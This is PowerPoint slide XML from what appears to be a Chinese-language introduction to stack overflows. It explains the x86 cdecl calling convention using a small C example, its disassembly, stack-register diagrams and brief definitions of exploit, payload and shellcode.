              <a:rPr lang="en" sz="1333" kern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1e:   e8 fc ff ff ff  call   1f &lt;caller+0xd&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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23:   83 c4 0c        add    $0xc,%esp</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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26:   89 45 fc        mov    %eax,-0x4(%ebp)</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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29:   83 45 fc 04     addl   $0x4,-0x4(%ebp)</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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2d:   8b 45 fc        mov    -0x4(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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30:   c9              leave</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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31:   c3              ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333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38" name="Shape 238"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="652144" y="1319939"/>
            <a:ext cx="4195600" cy="33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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern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int callee(int a, int b, int c) {</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0"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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern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return a + b + c;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0"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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern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600" kern="0"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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:endParaRPr sz="1600" kern="0"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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern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int caller(void) {</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0"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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern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int ret;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0"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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern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ret = callee(1, 2, 3);</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0"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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern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ret += 4;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0"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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern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return ret;</a:t>
            </a:r>
            <a:endParaRPr sz="1600" kern="0"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lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" kern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600" kern="0"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39" name="Shape 239"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5078395" y="2882363"/>
            <a:ext cx="1082000" cy="508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213CC25-F6BE-4F12-94DB-556019DA2B1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="261036" y="4584843"/>
            <a:ext cx="552157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C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x86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使用栈来传递参数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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eax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存放返回值</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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C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amd64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前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6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个参数依次存放于 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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rdi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、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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rsi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、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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rdx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、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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rcx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、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r8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、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r9 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寄存器中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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第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7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个以后的参数存放于栈中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21FAE31-FEFE-4584-82AB-272242EC9B3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="652144" y="761321"/>
            <a:ext cx="46394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函数调用栈的工作方式（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cdecl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4DB8EDCB-D9F1-49AD-849F-29198299935B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="56388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栈溢出基础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| C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语言函数调用栈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8A2071F-F8D6-449D-AFBE-4E92757D2704}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2962141" y="2274838"/>
            <a:ext cx="5551520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exploit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用于攻击的脚本与方案</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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payload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攻击载荷，是的目标进程被劫持控制流的数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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shellcode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调用攻击目标的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shell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的代码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05DEE00-5020-4663-B178-6141E9161323}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="326571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PWN? | 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一次简单的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hack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="53173945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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="4437733"/>
            <a:ext cx="4712800" cy="225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" sz="1333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00000000 &lt;callee&gt;:</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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0:   55          push   %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1:   89 e5       mov    %esp,%ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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3:   8b 55 08    mov    0x8(%ebp),%edx</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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6:   8b 45 0c    mov    0xc(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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9:   01 c2       add    %eax,%edx</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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b:   8b 45 10    mov    0x10(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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e:   01 d0       add    %edx,%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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10:   5d          pop    %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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11:   c3          ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333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46" name="Shape 246"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="1443533"/>
            <a:ext cx="4712800" cy="31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" sz="1333" kern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00000012 &lt;caller&gt;:</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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12:   55              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>push   %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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13:   89 e5           mov    %esp,%ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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15:   83 ec 10        sub    $0x10,%esp</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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18:   6a 03           push   $0x3</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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1a:   6a 02           push   $0x2</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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1c:   6a 01           push   $0x1</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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1e:   e8 fc ff ff ff  call   1f &lt;caller+0xd&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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23:   83 c4 0c        add    $0xc,%esp</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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26:   89 45 fc        mov    %eax,-0x4(%ebp)</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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29:   83 45 fc 04     addl   $0x4,-0x4(%ebp)</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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2d:   8b 45 fc        mov    -0x4(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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30:   c9              leave</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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31:   c3              ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333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47" name="Shape 247"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="1980133"/>
            <a:ext cx="2704800" cy="4096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%ebp in caller's caller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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="248" name="Shape 248"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6444800" y="2208367"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="249" name="Shape 249"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3771275" y="1633500"/>
              <a:ext cx="641400" cy="27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r" defTabSz="1219170">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1333" b="1" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:highlight>
                    <a:srgbClr val="666666"/>
                  </a:highlight>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>%esp</a:t>
              </a:r>
              <a:endParaRPr sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="250" name="Shape 250"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="1763700"/>
              <a:ext cx="484800" cy="6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sp>
        <p:nvSpPr>
          <p:cNvPr id="251" name="Shape 251"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8655400" y="1485751"/>
            <a:ext cx="1286800" cy="3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Stack</a:t>
            </a:r>
            <a:endParaRPr sz="1867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252" name="Shape 252"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-153529" y="1908581"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="253" name="Shape 253"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3510225" y="1324000"/>
              <a:ext cx="641400" cy="27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r" defTabSz="1219170">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1333" kern="0"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rPr>
                <a:t>%eip</a:t>
              </a:r>
              <a:endParaRPr sz="1333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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="254" name="Shape 254"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4151625" y="1454200"/>
              <a:ext cx="484800" cy="6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sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="文本框 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D839474-1063-4664-B889-74C8FE35E105}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="823118"/>
            <a:ext cx="46394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函数调用栈的工作方式（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cdecl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29B207E3-6E01-4E5F-8503-132EBEBBEC1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="56388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栈溢出基础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| C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语言函数调用栈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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="4437733"/>
            <a:ext cx="4712800" cy="225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" sz="1333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00000000 &lt;callee&gt;:</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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0:   55          push   %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1:   89 e5       mov    %esp,%ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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3:   8b 55 08    mov    0x8(%ebp),%edx</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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6:   8b 45 0c    mov    0xc(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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9:   01 c2       add    %eax,%edx</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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b:   8b 45 10    mov    0x10(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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e:   01 d0       add    %edx,%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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10:   5d          pop    %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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11:   c3          ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333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61" name="Shape 261"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="1443533"/>
            <a:ext cx="4712800" cy="31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" sz="1333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00000012 &lt;caller&gt;:</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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12:   55              push   %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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13:   89 e5           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov    %esp,%ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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15:   83 ec 10        sub    $0x10,%esp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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18:   6a 03           push   $0x3</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1a:   6a 02           push   $0x2</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1c:   6a 01           push   $0x1</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1e:   e8 fc ff ff ff  call   1f &lt;caller+0xd&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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23:   83 c4 0c        add    $0xc,%esp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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26:   89 45 fc        mov    %eax,-0x4(%ebp)</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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29:   83 45 fc 04     addl   $0x4,-0x4(%ebp)</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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2d:   8b 45 fc        mov    -0x4(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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30:   c9              leave</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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31:   c3              ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333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62" name="Shape 262"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="1980133"/>
            <a:ext cx="2704800" cy="4096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%ebp in caller's caller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63" name="Shape 263"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8655400" y="1485751"/>
            <a:ext cx="1286800" cy="3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Stack</a:t>
            </a:r>
            <a:endParaRPr sz="1867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264" name="Shape 264"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6099368" y="2208367"/>
            <a:ext cx="1847033" cy="365600"/>
            <a:chOff x="3512200" y="1633500"/>
            <a:chExt cx="1385275" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="265" name="Shape 265"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3512200" y="1633500"/>
              <a:ext cx="900600" cy="27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r" defTabSz="1219170">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1333" b="1" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:highlight>
                    <a:srgbClr val="666666"/>
                  </a:highlight>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>%esp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" sz="1333" kern="0"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333" b="1" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:highlight>
                    <a:srgbClr val="666666"/>
                  </a:highlight>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>%ebp</a:t>
              </a:r>
              <a:endParaRPr sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="266" name="Shape 266"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="1763700"/>
              <a:ext cx="484800" cy="6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267" name="Shape 267"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-153529" y="2102375"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="268" name="Shape 268"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3510225" y="1324000"/>
              <a:ext cx="641400" cy="27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r" defTabSz="1219170">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1333" kern="0"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rPr>
                <a:t>%eip</a:t>
              </a:r>
              <a:endParaRPr sz="1333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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="269" name="Shape 269"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4151625" y="1454200"/>
              <a:ext cx="484800" cy="6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sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="文本框 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{683F1B6D-43BA-4E9B-88E9-D2ED8F8A15B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
